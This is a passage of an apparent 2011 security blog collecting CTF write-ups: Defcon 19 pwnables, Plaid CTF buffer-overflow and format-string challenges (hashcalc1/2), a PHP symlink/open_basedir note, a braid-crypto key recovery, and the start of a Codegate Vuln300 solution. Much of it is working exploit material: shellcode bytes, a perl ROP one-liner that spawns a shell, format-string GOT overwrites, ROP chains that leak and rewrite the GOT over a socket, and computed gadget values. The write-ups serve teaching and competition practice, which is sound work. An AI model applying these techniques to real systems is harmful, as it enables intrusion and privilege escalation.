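wx_addr = 0x0804a480


def build_payload(shellcode_len):
    """Return (layout, payload) for the return-into-fread stage."""
    layout = [
        ("saved eip: jump to fread", fread_addr),
        ("fread return address: jump to shellcode", wx_addr),
        ("fread arg 1 (ptr)", wx_addr),
        ("fread arg 2 (size)", 1),
        ("fread arg 3 (nmemb)", shellcode_len),
        ("fread arg 4 (stream)", stdin_addr),
    ]
    return layout, b"".join(pack("<I", value) for _, value in layout)


layout, payload = build_payload(64)  # 64 is a placeholder length
for (label, _), value in zip(layout, unpack("<6I", payload)):
    print("0x%08x  %s" % (value, label))
```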

It requires only 24 bytes. But when I got the shell, I could use only builtin commands, no "id, cat, ls, ..." (I hope I did not make a mistake again). So I wrote shellcode to read the key file. Here is the full python code: pp400.py.

Monday, June 6, 2011

Defcon 19 Quals - Pwntent Pwnables 200 Writeup

First, I checked the binary with various commands

$ file pp200_64625bc51c5b8dc75b
pp200_64625bc51c5b8dc75b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
$ strings pp200_64625bc51c5b8dc75b
...
SUNW_0.7
libc.so.1
SUNW_0.9
SUNWprivate_1.1
...
$ objdump -s -j .comment pp200_64625bc51c5b8dc75b

pp200_64625bc51c5b8dc75b:     file format elf32-i386

Contents of section .comment:
 0000 00402823 2953756e 4f532035 2e313020  .@(#)SunOS 5.10
 0010 47656e65 72696320 4a616e75 61727920  Generic January
 0020 32303035 00004028 23295375 6e4f5320  2005..@(#)SunOS
 0030 352e3130 2047656e 65726963 204a616e  5.10 Generic Jan
 0040 75617279 20323030 35000040 28232953  uary 2005..@(#)S
 0050 756e4f53 20352e31 30204765 6e657269  unOS 5.10 Generi
 0060 63204a61 6e756172 79203230 30350000  c January 2005..
 0070 4743433a 2028474e 55292033 2e342e33  GCC: (GNU) 3.4.3
 0080 20286373 6c2d736f 6c323130 2d335f34   (csl-sol210-3_4
 0090 2d627261 6e63682b 736f6c5f 72706174  -branch+sol_rpat
 00a0 68290000 4743433a 2028474e 55292033  h)..GCC: (GNU) 3
...

From the output, we know this binary is for Solaris x86. The "file" command says the binary is stripped but it is not. When I opened it in IDA, all function names were resolved, so it is easy to read/guess the code.

The challenge is very straightforward. The program receives input from the client and then jumps to the received buffer+1. Just send the shellcode.

I had no knowledge of writing shellcode for Solaris, so I tried the metasploit "solaris/x86/shell_reverse_tcp" payload. Its size is 91 bytes but BUFSIZE is 0x49=73 bytes. The metasploit payload is too big for this challenge.

I planned to send a small shellcode that receives the big shellcode. My trick is reusing the program's code: push the size to be received, then jump to address 0x080516b4 so that the program calls recvAll with my size and then jumps to the received buffer+1 again. So the first shellcode is

sc = "\x6a\x5c"   # push 92
sc += "\xb8\xb4\x16\x05\x08" # mov eax,0x080516b4 
sc += "\xff\xe0"  # jmp eax
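The stage-1 bytes can also be generated from the two parameters, which guards against the kind of size mistake mentioned below. This is a sketch in Python 3 using only the encodings shown above (push imm8, mov eax imm32, jmp eax); the function name is made up for illustration.

```python
from struct import pack

BUFSIZE = 0x49               # 73 bytes, from the post
RECV_CALL_ADDR = 0x080516b4  # code address that calls recvAll, from the post


def stage1(recv_size):
    """Build the first-stage shellcode that re-enters the receive code."""
    if not 0 <= recv_size <= 0x7F:
        # push imm8 sign-extends, so larger values would become negative.
        raise ValueError("size must fit in a positive signed byte")
    sc = b"\x6a" + bytes([recv_size])           # push recv_size
    sc += b"\xb8" + pack("<I", RECV_CALL_ADDR)  # mov eax, RECV_CALL_ADDR
    sc += b"\xff\xe0"                           # jmp eax
    return sc


sc = stage1(92)
print(len(sc), sc.hex())
```

At 9 bytes the stage fits easily into the 73-byte buffer.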

The full python code is pp200_readAll.py

I failed to use the above method during the CTF because I put the wrong BUFSIZE in the python code. Then I learnt to write shellcode for Solaris x86 and tried connection reuse. I failed again because of my stupid mistake :[. I ended up writing shellcode to read the key file. Here is the python code for reading the key file: pp200.py.

After loading the OpenSolaris VMware image that someguy (sorry, I cannot remember the name) on IRC gave me a link to, I know why I failed to get the shell. Thanks for the link.

The key, I cannot remember. :P

Thursday, April 28, 2011

Plaid CTF 2011#19 - Another Small Bug

This challenge is a local stack-based buffer overflow. The binary is static, which means the libc shared object is not loaded and all needed libc functions are included in the binary. So we cannot use the trick of creating a weirdly named executable file and jumping to an exec*() function in libc.

Because the NX bit in the binary is disabled, the method I used in the competition was brute forcing, the same as in Leet More's writeup. But from talking on IRC, it seems the organizers made a mistake and the NX bit should have been enabled. StalkR's Blog has already posted a nice writeup for the case where NX is enabled. I also tried it assuming NX is enabled (and effective :P) just for fun. Here is my solution.

Let's see the code first. The main() function of this challenge is small, so I post it here.

int main(int argc, char **argv)
{
    char buffer[512];
    unsigned long len;
    if (argc != 2) {
        printf("...");
        exit(1);
    }
    len = strtoul(argv[1]);
    if (len > 511) {
        if (log_error("..."))
            myexit();
    }
    fgets(buffer, len, stdin);
    puts(buffer);
    return 0;
}

At first glance, it does not seem exploitable. But when I checked inside the log_error() function, it always fails because the log file does not exist. So we can use any length we want.

Because the binary is statically linked, let's check which libc functions are included in the binary.

$ objdump -t exploitme  | grep .text
...
08048890 g     F .text  00000011 printf
08049fa8 g     F .text  00000043 memmove
...
08049abc g     F .text  0000000e mmap
...
0804823f g     F .text  00000034 __unified_syscall
...
08048230 g     F .text  00000007 mprotect

There are many interesting functions, but "__unified_syscall" is the most interesting to me. It looks like the syscall() function in libc. Let's look at it more closely.

$ gdb ./exploitme
...
(gdb) b main
Breakpoint 1 at 0x804818a
(gdb) r
Starting program: /opt/pctf/z2/exploitme

Breakpoint 1, 0x0804818a in main ()
(gdb) x/10i __unified_syscall
0x804823f <__unified_syscall>:  movzbl %al,%eax
0x8048242 <__unified_syscall+3>:        push   %edi
0x8048243 <__unified_syscall+4>:        push   %esi
0x8048244 <__unified_syscall+5>:        push   %ebx
0x8048245 <__unified_syscall+6>:        mov    %esp,%edi
0x8048247 <__unified_syscall+8>:        mov    0x10(%edi),%ebx
0x804824a <__unified_syscall+11>:       mov    0x14(%edi),%ecx
0x804824d <__unified_syscall+14>:       mov    0x18(%edi),%edx
0x8048250 <__unified_syscall+17>:       mov    0x1c(%edi),%esi
0x8048253 <__unified_syscall+20>:       mov    0x20(%edi),%edi

The function moves its arguments to ebx, ecx, edx, esi and edi respectively. It looks like it is preparing for a syscall. Let's check an existing libc function that maps to a syscall.

(gdb) x/2i open
0x80489d0 <__libc_open>:        mov    $0x5,%al
0x80489d2 <__libc_open+2>:      jmp    0x804823f <__unified_syscall>

Yes, it is. "__unified_syscall" is a syscall() function, but we have to put the syscall number in eax before calling it.
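The same pattern ("mov $imm8,%al" followed by a jmp) can be used to name the syscall wrappers of a stripped binary automatically. Below is a minimal sketch that recognises the two-instruction stub and looks the number up in a small, deliberately incomplete table of i386 Linux syscall numbers. The example bytes are reconstructed from the disassembly above, assuming the jmp is a near jmp (opcode e9).

```python
# A few i386 Linux syscall numbers; extend as needed.
I386_SYSCALLS = {
    1: "exit", 3: "read", 4: "write", 5: "open", 6: "close",
    11: "execve", 90: "mmap", 125: "mprotect",
}


def identify_stub(code):
    """Name a wrapper that starts with `mov $imm8,%al` then jumps away."""
    if len(code) >= 3 and code[0] == 0xB0 and code[2] in (0xEB, 0xE9):
        number = code[1]
        return I386_SYSCALLS.get(number, "syscall_%d" % number)
    return None  # not a stub of this shape


# b0 05           mov $0x5,%al
# e9 68 f8 ff ff  jmp 0x804823f (relative to 0x80489d7)
open_stub = bytes([0xB0, 0x05, 0xE9, 0x68, 0xF8, 0xFF, 0xFF])
print(identify_stub(open_stub))
```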

I want to call the execve syscall (number 11), so all I have to do is prepare the arguments and set eax to 11. Preparing the arguments is easy because we control the content of the stack. But how do we set eax to 11? Normally it is difficult to find a "pop eax" gadget. To overcome this problem, I use the printf() function, because eax holds the return value of a function. From the return value section of the printf man page:

Upon successful return, these functions return the number of characters printed (not including the trailing '\0' used to end output to strings).

We just need to find a string whose length is 11. Very easy.

(gdb) x/10s 0x0804a378
0x804a378:       "a"
0x804a37a:       "/home/z2/logs/assert.log"
0x804a393:       "ERROR: %s\n"
0x804a39e:       "%s requires one arguments.\n"
0x804a3ba:       ""
0x804a3bb:       ""
0x804a3bc:       "[assertion] len < sizeof(buffer)"
0x804a3dd:       "/dev/urandom"
0x804a3ea:       "\n"
0x804a3ec:       "(null)"

I use address 0x804a3de ("dev/urandom") for printf() and 0x804a378 ("a") for execve(). The address that contains NULL is 0x804a444. Time to exploit it :).
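Any string of at least 11 characters works, because printf can be pointed at its last 11 characters, as long as that tail contains no "%" conversion. A small sketch that computes such addresses from the gdb listing above (the helper name is made up):

```python
# Address -> string, copied from the gdb output above.
STRINGS = {
    0x804A37A: "/home/z2/logs/assert.log",
    0x804A393: "ERROR: %s\n",
    0x804A3BC: "[assertion] len < sizeof(buffer)",
    0x804A3DD: "/dev/urandom",
}


def suffix_address(addr, text, wanted_len):
    """Address of the last wanted_len characters of text, or None."""
    if len(text) < wanted_len:
        return None
    tail = text[len(text) - wanted_len:]
    if "%" in tail:
        return None  # printf would interpret it as a conversion
    return addr + len(text) - wanted_len


for addr, text in sorted(STRINGS.items()):
    found = suffix_address(addr, text, 11)
    if found is not None:
        print("0x%x -> %r" % (found, text[-11:]))
```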

z2_82@a5:~$ ln -s /bin/sh a
z2_82@a5:~$ (perl -e 'print "A"x516,"\x2f\x82\x04\x08"x16,"\x90\x88\x04\x08","\x3f\x82\x04\x08","\xde\xa3\x04\x08","\x78\xa3\x04\x08","\x44\xa4\x04\x08"x2';echo;cat) | /opt/pctf/z2/exploitme 700
AAAAAAAAAAAAAA...
id
uid=2081(z2_82) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)

Another fun one ;)

Monday, April 25, 2011

Plaid CTF 2011 Hashcalc2 Writeup

This challenge is similar to hashcalc1, and I used the same method to solve it. So read my hashcalc1 writeup first.

The binary runs as a network service under inetd, so the socket fds are 0, 1 and 2. We do not need dup2() as in hashcalc1. Also, the hash calculation function has changed: it no longer calls any libc function.

The next libc function called is vsprintf(). But we cannot use it because its GOT entry address is 0x08049108. The address plus 2 is 0x0804910a, and 0x0a is a bad char.

The next function after that is strlen() again :). But the program calls vsprintf() with a buffer of only 0x100 bytes. To be safe, we should not overflow it. My workaround is to put 0x00 right after the format string payload, like this.
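A quick way to see the problem is to pack both halves of the write target and look for the bad byte. This is only a small sketch; the helper name is made up.

```python
import struct

BAD_CHAR = b"\x0a"  # the server turns every 0x0a into 0x00

def has_bad_char(addr):
    """Return True if the little-endian packed address contains 0x0a."""
    return BAD_CHAR in struct.pack("<I", addr)

vsprintf_got = 0x08049108  # GOT entry address quoted in the text

# A two-step %hn write needs both addr and addr+2 inside the payload.
for addr in (vsprintf_got, vsprintf_got + 2):
    print(hex(addr), has_bad_char(addr))
```

The first address is clean, but the second one packs to bytes that start with 0x0a, so the format string would be cut at that point.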

payload = payload_fmt + "\x00" + "A"*(0x2e0-len(payload_fmt)-1)

Another weird problem I found is that the server receives only part of the modified GOT table. So I changed the exploit to do recv() 2 times, each with only as much data as needed.

The rest is the same as hashcalc1. Here is my exploit: hashcalc2.py

$ python hashcalc2.py
** Welcome to the online hash calculator **
$
payload len: 840
got GOT table: 104
uid=1008(hashcalc2) gid=1009(hashcalc2) groups=1009(hashcalc2)

funkyG_1S_th3_b3$t

Key: funkyG_1S_th3_b3$t

Plaid CTF 2011 Hashcalc1 Writeup

This challenge is a remote pwnable. I spent a lot of time solving it, but I learned something new (so it was worth the time). Here is some info about the binary.

$ checksec.sh --file hashcalc1
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        Canary found      NX enabled    No PIE                  hashcalc1

Reversing the binary shows it is a classic accept() and fork() server. After the connection is established, the server send()s a welcome message, recv()s the data, logs it to a file, calculates the hash, then sends the hash back to the client. The log-to-file step has a format string bug. The C code should look like this.

recv(sock_fd, buffer, 0x3ff, 0);
// ...
fprintf(log_fp, buffer);

Note: after receiving data from the client, the server converts every '\n' (0x0a) to NULL (0x00). So 0x0a is a bad char, but 0x00 is a good char.

The format string bug obviously allows us to write any value to an arbitrary address. The usual target is a GOT entry. I found that strlen() is called after fprintf() (in the hash calculation function), so the strlen GOT entry is my target.

$ objdump -R hashcalc1 | grep strlen
0804a41c R_386_JUMP_SLOT   strlen

The address to be overwritten is 0x0804a41c. But the problem is what value to write. I tried to do a connect-back with ROP (without brute forcing). No luck, I could not find the gadgets to do what I wanted :(.

After a few hours, I noticed that the socket fd is known. In the accept() loop, the server process always calls close() before calling accept() again. So the fd is always 5, because 3 is the server fd and 4 is the log fd.

With a known socket fd, we can use ROP to make the server send data from, and receive data into, arbitrary addresses. We can jump (not call) to recv() or send() through their PLT entries. The fixed addresses of recv() and send() are

$ objdump -d hashcalc1 | grep '@plt>:' | grep -e recv -e send
08048844 <recv@plt>:
08048994 <send@plt>:

Normally, to call libc functions without brute forcing when ASLR is enabled, we need to take a resolved function address from a GOT entry and add an offset to it. With send(), we can make the program send the whole GOT section to us. Then we can modify any GOT entries and send the modified table back with recv().

At first, I planned to modify GOT entries to get mprotect() and other functions so that I could place shellcode. But then I remembered that a reverse shell is just a connect-back with a new socket, then dup2() and execve("/bin/sh"). We already have the socket, so we do not need shellcode. Just call dup2() and execve("/bin/sh"). And of course we can use some area of the GOT section to hold the "/bin/sh" string.

Now, coding time. First, for the format string bug, I need to move esp to the stack area I control. I found this gadget

0x8049106L: add esp 0x54 ; pop ebx ; pop esi ; pop ebp ;;

The format string to overwrite the strlen GOT entry with the gadget address 0x08049106 is

got_strlen_addr = 0x0804a41c
payload_fmt = pack("<I", got_strlen_addr) + pack("<I", got_strlen_addr+2) + "%"+str(0x804-8)+"x%6$hn" + "%"+str(0x9106-0x804)+"x%5$hn"
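To make the width arithmetic explicit, here is a minimal Python 3 sketch of the same two-step %hn write. The helper name and its generality are mine. It assumes the two packed addresses are the first 8 bytes printed and that they sit at argument positions 5 and 6, as in the payload above.

```python
import struct

def fmt_write32(target, value, first_arg):
    """Build a format string that writes a 32-bit value with two %hn writes.

    Assumes the two target addresses are the first bytes printed and that
    they are reachable as arguments first_arg (low half) and first_arg + 1.
    """
    addrs = struct.pack("<I", target) + struct.pack("<I", target + 2)
    # %hn stores the running count of printed chars, so write the smaller
    # 16-bit half first and pad up to the larger one afterwards.
    writes = sorted([(value & 0xffff, first_arg), (value >> 16, first_arg + 1)])
    printed = len(addrs)
    fmt = b""
    for half, arg_index in writes:
        pad = half - printed
        if pad <= 0:
            raise ValueError("halves must be distinct and larger than the prefix")
        fmt += f"%{pad}x%{arg_index}$hn".encode()
        printed = half
    return addrs + fmt

payload_fmt = fmt_write32(0x0804a41c, 0x08049106, first_arg=5)
print(payload_fmt[8:])
```

For this target the widths come out as 0x804-8 and 0x9106-0x804, the same numbers used in the original payload.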

Then, do send() and recv()

# 0x8048c1aL: add esp 0xc ; pop ebx ; pop ebp ;;
# send GOT table to me
payload += pack("<I", plt_send_addr) + pack("<I", 0x8048c1a) + pack("<I", sock_fd) + pack("<I", got_plt_section) + pack("<I", got_plt_section_size) + pack("<I", 0) + "JUNK"
# recv GOT table from me
payload += pack("<I", plt_recv_addr) + pack("<I", 0x8048c1a) + pack("<I", sock_fd) + pack("<I", got_plt_section) + pack("<I", got_plt_section_size) + pack("<I", 0) + "JUNK"
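The two frames have the same shape, so they can be built by one helper. This is a sketch in Python 3. The GOT section address below is a hypothetical placeholder (the writeup does not give it), and the size 156 is taken from the "got GOT table: 156" line in the exploit output further down.

```python
import struct

def p32(value):
    return struct.pack("<I", value)

PLT_SEND = 0x08048994
PLT_RECV = 0x08048844
CLEANUP_GADGET = 0x08048c1a   # add esp 0xc ; pop ebx ; pop ebp ; ret
SOCK_FD = 5
GOT_PLT_SECTION = 0x0804a3f4  # hypothetical placeholder address
GOT_PLT_SECTION_SIZE = 156    # assumed from the exploit output

def call4(func, a, b, c, d):
    """One ROP frame: jump to func(a, b, c, d), then skip its arguments.

    The cleanup gadget drops 0xc bytes (a, b, c), pops d into ebx and the
    trailing junk word into ebp, then returns into the next frame.
    """
    return p32(func) + p32(CLEANUP_GADGET) + p32(a) + p32(b) + p32(c) + p32(d) + b"JUNK"

chain  = call4(PLT_SEND, SOCK_FD, GOT_PLT_SECTION, GOT_PLT_SECTION_SIZE, 0)
chain += call4(PLT_RECV, SOCK_FD, GOT_PLT_SECTION, GOT_PLT_SECTION_SIZE, 0)
print(len(chain))
```

Each frame is 28 bytes: the function, the gadget, four arguments and one junk word, which is exactly what the gadget consumes before its ret.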

Then, do dup2() and execve() with a similar method. I do not show it here.

Another important part is finding the function offsets in libc. I used Ubuntu, but when looking at the binary with objdump

$ objdump -s -j .comment hashcalc1

hashcalc1:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 20284465 6269616e 20342e34  GCC: (Debian 4.4
 0010 2e352d38 2920342e 342e3500 4743433a  .5-8) 4.4.5.GCC:
 0020 20284465 6269616e 20342e34 2e352d31   (Debian 4.4.5-1
 0030 30292034 2e342e35 00                 0) 4.4.5.

The binary was compiled on Debian 6. So I tried to overwrite the functions that are near dup2() and execve() and hoped the offsets were the same. Even if the offsets are different, I can still do a little brute forcing to get them (the exploit can send some data back if the offset is correct). But there was no need for that in this challenge, because the server that ran this binary was the same one we could log in to for the local pwnable challenges.

$ objdump -T libc.so.6 | grep -w -e setreuid -e dup2
000c4b50  w   DF .text  00000076  GLIBC_2.0   setreuid
000bd760  w   DF .text  0000003d  GLIBC_2.0   dup2
$ objdump -T libc.so.6 | grep -w -e fork -e execve
00097550  w   DF .text  000002b0  GLIBC_2.0   fork
00097870  w   DF .text  00000053  GLIBC_2.0   execve
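The rebasing itself is simple arithmetic. Here is a sketch using the offsets from the objdump output above. The leaked address in the example is made up, and pairing setreuid with dup2 and fork with execve is my reading of the two objdump commands.

```python
# Offsets inside libc.so.6, copied from the objdump -T output.
LIBC_OFFSETS = {
    "setreuid": 0x000c4b50,
    "dup2":     0x000bd760,
    "fork":     0x00097550,
    "execve":   0x00097870,
}

def rebase(leaked_addr, leaked_name, wanted_name):
    """Turn a resolved address of one libc function into another one."""
    delta = LIBC_OFFSETS[wanted_name] - LIBC_OFFSETS[leaked_name]
    return (leaked_addr + delta) & 0xffffffff

# Hypothetical value read from the leaked GOT table (libc base 0xb7e00000).
leaked_setreuid = 0xb7ec4b50

print(hex(rebase(leaked_setreuid, "setreuid", "dup2")))
print(hex(LIBC_OFFSETS["execve"] - LIBC_OFFSETS["fork"]))
```

Only GOT entries that are already resolved (functions the server has called at least once) hold a real libc address, so the leaked entry has to be chosen with that in mind.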

Here is my exploit: hashcalc1.py

$ python hashcalc1.py
** Welcome to the online hash calculator **
$
payload len: 164
got GOT table: 156
uid=1009(hashcalc1) gid=1010(hashcalc1) groups=1010(hashcalc1),0(root)

th3_0tH3r_DJB

Key: th3_0tH3r_DJB

Sunday, April 17, 2011

PHP symlink() and open_basedir

Someone asked me about the exploit from http://securityreason.com/achievement_exploitalert/14: why could they not delete the symbolic links it created?

The explanation of the exploit is at http://securityreason.com/achievement_securityalert/70 (if you have a problem accessing it, here is a backup: http://seclists.org/fulldisclosure/2009/Nov/165).

This exploit just creates a symbolic link to a file outside open_basedir with a neat trick, then uses the web server to access it (without invoking the PHP interpreter). In my opinion, this is not a PHP vulnerability. It is a feature (you can still do it with the latest PHP). If we try to access the symbolic link with PHP functions (such as readfile() or file_get_contents()), we get an error message related to open_basedir. We also cannot delete or modify the symbolic links with the unlink() PHP function because of the open_basedir restriction (which answers the question above).

I think the easier way to abuse this feature is to create a symbolic link to the root directory. No exploit from me. It's so easy to write :).

The workaround for this problem is to add symlink() to "disable_functions", or to disable following symbolic links in the web server (FollowSymLinks in Apache).

Update: I overlooked a method to delete the symbolic link. We just need to do the reverse: remove the directory and recreate tmplink. Here is the PHP code to delete the symbolic link created by kakao.php from the advisory.

<?php
rmdir("tmplink");
symlink("abc/abc/abc/abc","tmplink");
unlink("exploit");
unlink("tmplink");

Update: If you install the Suhosin patch, you are safe from this problem by default. See http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.allow_symlink for more information.

Monday, April 4, 2011

Nuit du Hack CTF 2011 Crypto 300 Writeup

Challenge : http://repo.shell-storm.org/CTF/NDH2K11-prequals/CRYPTO/CRYPTO300/crypto300.zip

The challenge gives me Python code. The code is some kind of key exchange algorithm (I do not know which one). There are 3 important methods in the Braid class.

class Braid:
    # ...
    def reverse(self):
        rev = [self.items.index(i) for i in range(self.size)]
        return Braid(rev)
       
    def combine(self, _braid):
        if len(_braid) != self.size:
            raise "Invalid size"
        return Braid([_braid[self.items[i]] for i in range(self.size)])

    def shuffle(self,offset=0,size=0):
        for j in range(randint(1024,4096)):
            if size==0: # client
                for i in range(offset,self.size): # range(11, 22)
                    idx1 = randint(offset,self.size-1) # randint(11, 21)
                    self.swap(i,idx1)
            else:  # server
                for i in range(offset,size): # range(0, 11)
                    idx1 = randint(0,size-1) # randint(0, 10)
                    self.swap(i,idx1)

The public key and private key are generated in the BraidKey class

class BraidKey:
    def __init__(self, K, client):
        self.K = K
        N = len(K)
        self.privkey = Braid(N)
        if client:
            self.privkey.shuffle(offset=N/2)
        else:
            self.privkey.shuffle(size=N/2)
        self.privrkey = self.privkey.reverse()
        self.pubkey = self.privkey.combine(self.K.combine(self.privrkey))

From the code, the client privkey is initialized with [0..21], then only the last 11 elements are shuffled while the first 11 stay fixed. So the client privkey is always [0..10, randomly shuffled]. The client privrkey is derived from privkey with a rather strange reverse function (it actually computes the inverse permutation). Given how privkey is generated, the client privrkey is always [0..10, derived from privkey].

When looking in "server.py", I found

raw_K = '0D1214040108060F050C0E0207030A151009000B1311'
self.s = ServerSocket(peer,allowed_pubkeys=['0F0C11040108060B05150E1000090A030D1312140207'])

So the server accepts only the public key '0F0C11040108060B05150E1000090A030D1312140207'. From the pubkey generation algorithm (the last line of BraidKey.__init__), we know pubkey, half of privkey, K, and half of privrkey. Also, the combine() function is reversible. So I think it is possible to find the privkey from the pubkey.

It is difficult to explain. Just see the code of findpriv.py (I know you guys will understand :P).
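To show what "reversible" means here, the following sketch treats combine() and reverse() as plain functions on lists (Python 3, not the challenge's Braid class). The two recover_* helpers are my own names. They undo combine() when one operand is fully known.

```python
import random

def combine(a, b):
    """Same rule as Braid.combine: result[i] = b[a[i]]."""
    return [b[a[i]] for i in range(len(a))]

def reverse(a):
    """Same rule as Braid.reverse: the inverse permutation of a."""
    return [a.index(i) for i in range(len(a))]

def recover_right(a, c):
    """Recover b from c = combine(a, b), using b[a[i]] = c[i]."""
    b = [None] * len(a)
    for i, a_i in enumerate(a):
        b[a_i] = c[i]
    return b

def recover_left(b, c):
    """Recover a from c = combine(a, b): a[i] is the position of c[i] in b."""
    return [b.index(c_i) for c_i in c]

random.seed(1)
n = 22
a = list(range(n))
b = list(range(n))
random.shuffle(a)
random.shuffle(b)
c = combine(a, b)

print(recover_right(a, c) == b, recover_left(b, c) == a)
print(combine(a, reverse(a)) == list(range(n)))
```

In the challenge only half of each key is known, so the recovery has to be done piece by piece, filling in entries as they become determined.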

K = str2ary(hex2str("0D1214040108060F050C0E0207030A151009000B1311"))
pubkey = str2ary(hex2str("0F0C11040108060B05150E1000090A030D1312140207"))

priv =  [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 ]
privr = [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 ]
inter = [ -1 ]*22  # inter is self.K.combine(self.privrkey)
for i in range(11):
    inter[i] = pubkey[i]

# pubkey = priv.combine(K.combine(privr))
# for i in [0,11)  =>  priv[i] = i; pubkey[i] = inter[priv[i]] = inter[i] = privr[K[i]]
for i in range(11):
    privr[K[i]] = pubkey[i]

# inter = K.combine(privr); inter[i] = privr[K[i]]
for i in range(11, 22):
    inter[i] = privr[K[i]]

# pubkey = priv.combine(inter); pubkey[i] = inter[priv[i]]
for i in range(11, 22):
    if pubkey[i] in inter:
        priv[i] = inter.index(pubkey[i])
    
# privr = priv.reverse()
for i in range(11, 22):
    if i in priv:
        privr[i] = priv.index(i)
for i in range(11, 22):
    if privr[i] != -1:
        priv[privr[i]] = i

# inter = K.combine(privr); inter[i] = privr[K[i]]
for i in range(11, 22):
    inter[i] = privr[K[i]]

# pubkey = priv.combine(inter); pubkey[i] = inter[priv[i]]
for i in range(11, 22):
    if pubkey[i] in inter:
        priv[i] = inter.index(pubkey[i])

if priv.count(-1) == 1:
    pos = priv.index(-1)
    for i in range(22):
        if i not in priv:
            priv[pos] = i
            break

print priv
$ python findpriv.py
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 18, 17, 14, 13, 21, 20, 16, 19, 11, 12]
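As a sanity check, the recovered private key can be pushed back through the pubkey formula from BraidKey.__init__. This is a small Python 3 sketch with combine() and reverse() rewritten as plain functions on lists. bytes.fromhex() stands in for the str2ary/hex2str helpers, which are not shown here.

```python
def combine(a, b):
    """Same rule as Braid.combine: result[i] = b[a[i]]."""
    return [b[a[i]] for i in range(len(a))]

def reverse(a):
    """Same rule as Braid.reverse: the inverse permutation of a."""
    return [a.index(i) for i in range(len(a))]

K = list(bytes.fromhex("0D1214040108060F050C0E0207030A151009000B1311"))
pubkey = list(bytes.fromhex("0F0C11040108060B05150E1000090A030D1312140207"))

# Private key printed by findpriv.py.
priv = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
        15, 18, 17, 14, 13, 21, 20, 16, 19, 11, 12]
privr = reverse(priv)

# pubkey = privkey.combine(K.combine(privrkey))
recomputed = combine(priv, combine(K, privr))
print(recomputed == pubkey)
```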

Then I changed the self.privkey.shuffle(offset=N/2) line in the BraidKey class to self.privkey = [above privkey].

$ python client.py
[Crypto300 sample client]
[i] Welcome on Goofyleaks. Can I haz ur public kay ?
[+] Your leaked flag: Br4iDCrypto_i5_b3au7ifu11

Answer: Br4iDCrypto_i5_b3au7ifu11

Monday, March 7, 2011

Codegate CTF 2011 Vuln300 Writeup

In this challenge, we were given an ssh account on Ubuntu 10.10. We have to exploit the binary inside /home/vuln1 to get the vuln1 privilege and grab the flag. ASLR and NX are enabled. The binary was compiled without stack cookies and without PIE.

After reading the assembly in IDA, I rewrote the code in C (vuln300.c). Below are the important parts.

char gbuffer[512];  // 0x0804a0a0
int authenticated;

int authen(char *username, char *password)
{
    snprintf(gbuffer, 513, "%s:%s", username, password);
    if (!authenticated)
        authenticated = (strncmp(gbuffer, "s0m3b0dy:15n0b0dy", 17) == 0);

    return authenticated;
}

void add_user(char *newusername, char *newpassword, char *filename)
{
    char buffer[512];
    char user_len, pass_len;

    user_len = (char) strlen(newusername);
    strncpy(buffer, newusername, 511);
    pass_len = (char) strlen(newpassword);
    strncat(buffer, newpassword , 512);

    fprintf(stdout, "New user %s added to %s!\n", newusername, filename);
}

Problem in authen() function

The authen() function uses strncmp() to compare the strings, so we can authenticate with any username that starts with "s0m3b0dy:15n0b0dy". In addition, the gbuffer address is static (0x0804a0a0) because the binary is not PIE. We can put the payload in gbuffer to create a reliable exploit.

Problem in add_user() function

It is obvious that there is a buffer overflow in this function. We can overwrite the saved ebp and saved eip. But we should not write past the saved eip, because fprintf might crash if the newusername address is invalid.


With the above 2 problems (plus the GOT being writable), I came up with these steps.

  1. Overwrite the saved ebp to move esp into the gbuffer area with "leave; ret"
  2. Put a ROP stack in gbuffer that adds an offset to a GOT entry so that it points to execve()
  3. Call execve()

To achieve step 2, I used ROPEME to find the gadgets. Because we only want to add a value at a static address (a GOT entry), here are the interesting gadgets

0x8048559L: add eax 0x804a064 ; add [ebx+0x5d5b04c4] eax ;;
0x8048418L: pop eax ; pop ebx ; leave ;;

The second gadget is for setting eax and ebx. Then we can use the first gadget to change the value of the GOT entry. I modified the sleep() entry at address 0x804a01c.

$ objdump -T libc.so.6 | grep -w sleep
00098e50  w   DF .text  00000299  GLIBC_2.0   sleep
$ objdump -T libc.so.6 | grep -w execve
00099510  w   DF .text  0000005a  GLIBC_2.0   execve

Some needed computations (all modulo 2^32)
- The offset from sleep() to execve() in libc is 0x00099510 - 0x00098e50 = 0x6c0
- eax before calling the first gadget should be 0x1000006c0 - 0x0804a064 = 0xf7fb665c
- ebx before calling the first gadget should be 0x10804a01c - 0x5d5b04c4 = 0xaaa99b58

Here is my exploit, which calls execve("0dy", 0, 0) (I used the "0dy" string from "s0m3b0dy:15n0b0dy" at address 0x08048a24)
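The same numbers can be reproduced in Python 3 with explicit 32-bit wraparound. The constant names are mine. The last two lines simulate what the first gadget does with these register values.

```python
MASK = 0xffffffff  # registers are 32 bits wide

SLEEP_OFFSET  = 0x00098e50  # from objdump -T libc.so.6
EXECVE_OFFSET = 0x00099510
GOT_SLEEP     = 0x0804a01c  # GOT entry to be patched

GADGET_EAX_ADD  = 0x0804a064  # add eax 0x804a064
GADGET_EBX_DISP = 0x5d5b04c4  # add [ebx+0x5d5b04c4] eax

delta = EXECVE_OFFSET - SLEEP_OFFSET
eax = (delta - GADGET_EAX_ADD) & MASK
ebx = (GOT_SLEEP - GADGET_EBX_DISP) & MASK
print(hex(delta), hex(eax), hex(ebx))

# Simulate the gadget: eax wraps around to the delta, the store hits the GOT.
eax_after_add = (eax + GADGET_EAX_ADD) & MASK
store_address = (ebx + GADGET_EBX_DISP) & MASK
print(hex(eax_after_add), hex(store_address))
```

These are the values that appear little-endian in the exploit as "\x5c\x66\xfb\xf7" and "\x58\x9b\xa9\xaa".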

